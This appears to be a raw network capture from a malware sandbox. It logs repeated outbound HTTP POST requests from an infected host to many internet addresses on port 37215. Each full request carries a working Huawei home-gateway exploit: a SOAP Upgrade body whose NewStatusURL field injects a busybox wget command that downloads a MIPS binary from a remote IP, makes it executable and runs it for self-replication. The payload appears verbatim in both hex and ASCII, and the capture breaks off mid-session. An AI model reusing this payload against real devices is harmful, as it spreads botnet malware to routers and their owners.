                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1235192.168.2.1536996197.80.212.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760097980 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1236192.168.2.1552760197.49.241.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760111094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1237192.168.2.153282041.253.164.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760127068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1238192.168.2.1542818157.112.7.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760154963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1239192.168.2.154054641.10.5.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760169983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1240192.168.2.1542224157.147.54.21937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760190010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1241192.168.2.153760841.86.180.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.766536951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1242192.168.2.1536316157.145.154.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.767431974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1243192.168.2.1552236126.96.29.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.767568111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1244192.168.2.1548054197.180.92.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.768157005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
